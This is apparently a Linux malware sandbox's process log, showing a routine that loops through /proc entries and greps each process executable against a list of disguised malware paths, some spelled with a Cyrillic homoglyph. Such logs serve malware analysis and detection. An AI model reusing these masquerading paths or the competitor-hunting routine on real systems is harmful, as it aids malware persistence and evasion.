/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:837
-
-
/bin/grepgrep exe2⤵PID:840
-
-
/bin/lsls -latrh /proc/202⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:842
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/lsls -latrh /proc/212⤵PID:844
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:847
-
-
/bin/grepgrep exe2⤵PID:850
-
-
/bin/lsls -latrh /proc/222⤵PID:849
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:855
-
-
/bin/lsls -latrh /proc/232⤵PID:854
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:860
-
-
/bin/lsls -latrh /proc/2352⤵PID:859
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:862
-
-
/bin/grepgrep exe2⤵PID:865
-
-
/bin/lsls -latrh /proc/242⤵PID:864
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:870
-
-
/bin/lsls -latrh /proc/32⤵PID:869
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:872
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/3282⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:880
-
-
/bin/lsls -latrh /proc/3322⤵PID:879
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:882
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/lsls -latrh /proc/3332⤵PID:884
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:887
-
-
/bin/grepgrep exe2⤵PID:890
-
-
/bin/lsls -latrh /proc/3592⤵PID:889
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:892
-
-
/bin/grepgrep exe2⤵PID:895
-
-
/bin/lsls -latrh /proc/362⤵PID:894
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:897
-
-
/bin/grepgrep exe2⤵PID:900
-
-
/bin/lsls -latrh /proc/3602⤵PID:899
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:902
-
-
/bin/grepgrep exe2⤵PID:905
-
-
/bin/lsls -latrh /proc/372⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:907
-
-
/bin/grepgrep exe2⤵PID:910
-
-
/bin/lsls -latrh /proc/3722⤵PID:909
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:912
-
-
/bin/grepgrep exe2⤵PID:915
-
-
/bin/lsls -latrh /proc/3752⤵PID:914
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/grepgrep exe2⤵PID:920
-
-
/bin/lsls -latrh /proc/3862⤵PID:919
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/lsls -latrh /proc/42⤵PID:924
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/grepgrep exe2⤵PID:930
-
-
/bin/lsls -latrh /proc/4872⤵PID:929
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:932
-
-
/bin/grepgrep exe2⤵PID:935
-
-
/bin/lsls -latrh /proc/52⤵PID:934
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/grepgrep exe2⤵PID:942
-
-
/bin/lsls -latrh /proc/62⤵PID:941
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:944
-
-
/bin/grepgrep exe2⤵PID:948
-
-
/bin/lsls -latrh /proc/6602⤵PID:947
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:951
-
-
/bin/grepgrep exe2⤵PID:954
-
-
/bin/lsls -latrh /proc/6682⤵PID:953
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:958
-
-
/bin/grepgrep exe2⤵PID:961
-
-
/bin/lsls -latrh /proc/6732⤵PID:960
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:964
-
-
/bin/grepgrep exe2⤵PID:968
-
-
/bin/lsls -latrh /proc/6742⤵PID:967
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:970
-
-
/bin/grepgrep exe2⤵PID:974
-
-
/bin/lsls -latrh /proc/692⤵PID:973
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:977
-
-
/bin/grepgrep exe2⤵PID:981
-
-
/bin/lsls -latrh /proc/6922⤵PID:980
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:984
-
-
/bin/lsls -latrh /proc/72⤵PID:986
-
-
/bin/grepgrep exe2⤵PID:987
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:990
-
-
/bin/grepgrep exe2⤵PID:994
-
-
/bin/lsls -latrh /proc/702⤵PID:993
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:1000
-
-
/bin/lsls -latrh /proc/7052⤵PID:999
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1007
-
-
/bin/lsls -latrh /proc/7062⤵PID:1006
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1010
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/712⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1017
-
-
/bin/grepgrep exe2⤵PID:1021
-
-
/bin/lsls -latrh /proc/7102⤵PID:1020
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1024
-
-
/bin/grepgrep exe2⤵PID:1028
-
-
/bin/lsls -latrh /proc/7112⤵PID:1027
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1031
-
-
/bin/grepgrep exe2⤵PID:1034
-
-
/bin/lsls -latrh /proc/7122⤵PID:1033
-
-
